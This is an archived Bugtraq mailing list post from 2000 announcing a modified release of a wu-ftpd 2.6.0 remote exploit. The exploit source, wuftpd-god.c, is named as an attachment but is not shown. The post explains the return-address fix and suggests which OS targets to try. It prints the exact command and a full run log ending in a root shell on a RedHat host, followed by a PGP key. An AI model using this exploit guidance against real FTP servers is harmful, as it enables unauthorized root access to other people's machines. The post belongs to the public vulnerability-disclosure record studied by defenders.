Bugtraq mailing list archives
New Released Version of the WuFTPD Sploit
From: eric.hines () NUASIS COM (Eric Hines)
Date: Fri, 7 Jul 2000 11:43:35 -0700
This is for the mass amounts of people out there who were not able to hit the correct retr_addr with the previously disseminated exploits. This one nailed my machines perfectly. The previous problems were caused by the other exploits not specifying the correct pointer to the shell code, ultimately leaving you with a telnet session to PORT 21 of the vulnerable machine. While working with some people over at MIT, we discovered that some machines were hit, while others with the same configuration weren't. This is yet to be understood. Anyway, I've attached it herein. This as you will notice is TF8's original distribution, slightly modified. Notice the new AddrRetAddr field. If s0 doesn't work, I would reccomend trying the other OS distributions in the list. My command string was: [root@soc1 source]# ./wuftpd-god -s0 -t localhost Target: localhost (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152 loggin into system.. USER ftp 331 Guest login ok, send your complete e-mail address as password. PASS <shellcode> 230-Next time please use your e-mail address as your password 230- for example: joe@localhost.localdomain 230 Guest login ok, access restrictions apply. STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04] STEP 3 : Checking if we can reach our return address by format string STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now) STEP 5 : Sending code.. this will take about 10 seconds. Press ^\ to leave shell Linux soc1.priv.nuasis.com 2.2.14-5.0smp #1 SMP Tue Mar 7 21:01:40 EST 2000 i686 unknown uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp) RE: Eric -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGP 6.5.2 mQGiBDlP0fgRBADQ6w878kgQ0T1aQOHRHXBu1C+iVUmqDl1R2SE7x+RyoMpYvdTc 8piV4Z2VlbUqf41w9s7jNy3F3M9qj/8EriI7sdmsyyBQiJNonU1lSyaAAWYhqHZ1 DYb0o6PzD3NVctCAsqDoxrHqJlbuuj49pOU0hJcbeIjhy1yupVotV6uB3wCg/zDo 1Swb7FFDHIqDyQ7Kuf+v5r0EAMfm2A/qV4lbXdshRu1o90Wgw0wJwJgjPiU8kelr T5yVKbBGf6AlkkPagG1+URDZZbKux4pZNn8/GXRubH61vccJ9JUVr9urAQrGhKW9 Hh1BTS1uXbpIMxu1ZquVjEKDS6lao6k6DiamuVEAzL3Ui6R5C/Lfxc0RulijUwZL Zj6eA/9fL77pYEgDL9VToX3iI21nIDnHxzabbPYjWUBEtRuTJm1nTdBwjhwRzkfZ h1PrWZ+pYlVMQvIbLhimT6TYRKgXuthuXlC519E81pQB9HK81E1bq5B2JtuhwrdE hV3UtXihzJc65m4ciSYGnmbuyLMvveYN66hGgSSPrJ3dEtQi/rQiRXJpYyBIaW5l cyA8ZXJpYy5oaW5lc0BudWFzaXMuY29tPokAVAQQEQIAFAUCOU/R+AUJOGQJAAQL AwECAhkBAAoJEDBk0XCTfivZAdIAnRELzgdEfu7bG//ObhtZR5Ok2w0YAKCVCopD ljrpyfJtTP48g7Cx0nbK37kCDQQ5T9H9EAgA9kJXtwh/CBdyorrWqULzBej5UxE5 T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/c dlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaCl cjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD 8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZ yAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwACAgf+ I5IyJ5LMKjItUVMFvgSrbR2xlNXE7iGO4OJy5dgM6tdw0r9u64XccySbFDvQO9cm khgmF1qrpPLpdqsPxLtUEI87r3xDndejwDUjKWceDdIotbZZ8Hphf064eC4HW7S4 smJPIbuW768fkB9sAIY9aLANcVVnwRyOJBORYDhn3PLUR7xVun1SN+XxKbAJB8lP HBZ0D6/eOl45WeOjuVh31mZt7XwbQaRl4UV8SnjxQToeOB1ivhqcT8Fmv3lFuXEu uQZ32yfZSJs0uAj8vhyF0J+lsuwl8QK3VON6ZI/VAElH5P9YUr6AFdDEWfRmoGl+ V6HmN/yLrs2iYbV89PfluIkATAQYEQIADAUCOU/R/QUJOGQJAAAKCRAwZNFwk34r 2fbRAJ93tZZJStohApQmo2ANFtlS6eK8wQCfZvWiu70Yc2Nn9EYRa1iykp8iq34= =7vK/ -----END PGP PUBLIC KEY BLOCK----- <HR NOSHADE> <UL> <LI>text/x-c attachment: wuftpd-god.c </UL>
Current thread:
- New Released Version of the WuFTPD Sploit Eric Hines (Jul 07)